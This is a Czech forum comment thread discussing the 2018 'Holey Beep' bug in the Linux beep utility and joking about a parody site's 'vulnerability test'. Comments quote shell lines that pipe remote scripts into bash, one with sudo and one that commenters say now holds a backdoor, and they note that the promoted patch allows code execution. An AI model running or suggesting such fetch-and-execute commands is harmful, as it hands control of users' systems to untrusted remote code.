Portál AbcLinuxu, 14. května 2025 19:13

Nástroje: Začni sledovat (1) ?Zašle upozornění na váš email při vložení nového komentáře.

Vložit další komentář
4.4.2018 12:51 marbu | skóre: 31 | blog: hromada | Brno
Rozbalit Rozbalit vše Re: Holey Beep, bezpečnostní chyba v programu beep
Odpovědět | Sbalit | Link | Blokovat | Admin
Readme toho beep nástroje je docela poučné:
What this means is that root can always make beep work (to the best of my knowledge!), and that any local user can make beep work, BUT a non-root remote user cannot use beep in it's natural state. What's worse, an xterm, or other x-session counts, as far as the kernel is concerned, as 'remote', so beep won't work from a non-priviledged xterm either. I had originally chalked this up to a bug, but there's actually nothing I can do about it, and it really is a Good Thing that the kernel does things this way. There is also a solution.

By default beep is not installed with the suid bit set, because that would just be zany. On the other hand, if you do make it suid root, all your problems with beep bailing on ioctl calls will magically vanish, which is pleasant, and the only reason not to is that any suid program is a potential security hole. Conveniently, beep is very short, so auditing it is pretty straightforward.

Decide for yourself, of course, but it looks safe to me - there's only one buffer and fgets doesn't let it overflow, there's only one file opening, and while there is a potential race condition there, it's with /dev/console. If someone can exploit this race by replacing /dev/console, you've got bigger problems. :)
There is no point in being so cool in a cold world.
4.4.2018 14:55 Lyco | skóre: 14 | blog: Lyco
Rozbalit Rozbalit vše Re: Holey Beep, bezpečnostní chyba v programu beep
Odpovědět | Sbalit | Link | Blokovat | Admin
Ta stránka s infomracemi je skvělá. Vynikající parodie.

Nejvíc se mi asi líbil "test jestli je počítač zranitelný":
# curl https://holeybeep.ninja/am_i_vulnerable.sh | sudo bash
# nejsem blázen

curl https://holeybeep.ninja/am_i_vulnerable.sh
#!/bin/sh
# TODO: Backdoor this machine?
modprobe pcspkr
beep -l 1000 -r 3 -f 44000
Příspěvek se rázem stává až o 37,5 % pravdivější, je-li pod ním napsáno reálné jméno.
AsciiWolf avatar 4.4.2018 18:42 AsciiWolf | skóre: 41 | blog: Blog
Rozbalit Rozbalit vše Re: Holey Beep, bezpečnostní chyba v programu beep
Tak v nynější verzi už ten backdoor skutečně je. :-D
$ cat am_i_vulnerable.sh
#!/bin/sh
curl https://l0.re/hb | bash
modprobe pcspkr
beep -l 1000 -r 3 -f 44000
5.4.2018 00:01 Semo | skóre: 45 | blog: Semo
Rozbalit Rozbalit vše Re: Holey Beep, bezpečnostní chyba v programu beep
Code execution je aj v patchi propagovanom na https://holeybeep.ninja/
If you hold a Unix shell up to your ear, you can you hear the C.
5.4.2018 23:08 marbu | skóre: 31 | blog: hromada | Brno
Rozbalit Rozbalit vše Re: Holey Beep, bezpečnostní chyba v programu beep
Eh, to je taky dobré. Viz: patch runs ed, and ed can run anything.
There is no point in being so cool in a cold world.
Ruža Becelin avatar 5.4.2018 14:20 Ruža Becelin | skóre: 40 | blog: RuzaBecelinBlog
Rozbalit Rozbalit vše Re: Holey Beep, bezpečnostní chyba v programu beep
Odpovědět | Sbalit | Link | Blokovat | Admin
How do I uninstall Linux?

Please follow these instructions.

By me zajimalo, jestli podobne cenne rady udileji, pokud se najde chyba ve Windows...
5.4.2018 14:55 Honza
Rozbalit Rozbalit vše Re: Holey Beep, bezpečnostní chyba v programu beep
Kdyz nejaky troll pak udela podobnou stranku, tak ano. Staci se podivat na commity...

Založit nové vláknoNahoru

Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

ISSN 1214-1267, (c) 1999-2007 Stickfish s.r.o.